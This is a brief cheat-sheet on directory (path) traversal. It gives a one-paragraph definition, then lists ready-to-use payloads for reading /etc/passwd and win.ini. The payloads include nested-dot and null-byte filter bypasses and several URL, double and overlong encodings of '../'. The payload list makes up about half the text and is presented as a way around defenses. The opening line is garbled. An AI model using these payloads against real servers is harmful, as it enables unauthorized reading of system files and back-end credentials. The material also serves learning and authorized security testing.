Directory Traversal

Read random files that is running an application.

Directory traversal (or path traversal) is a web security vulnerability that allows an attacker to read arbitrary files on the server that is running an application.

This might include application code and data, credentials for back-end systems and sensitive operating system files.

Bypass path traversal filters

..\..\..\windows\win.ini --> Windows OS

../../../etc/passwd

....//....//....//etc/passwd

/var/www/images/../../../etc/passwd 

../../../etc/passwd%00.png --> null byte bypass

URL Encoding

Char	Encode
../	%2e%2e%2f
../	%252e%252e%252f
../	..%252f
../	..%c0%af
../	..%ef%bc%8f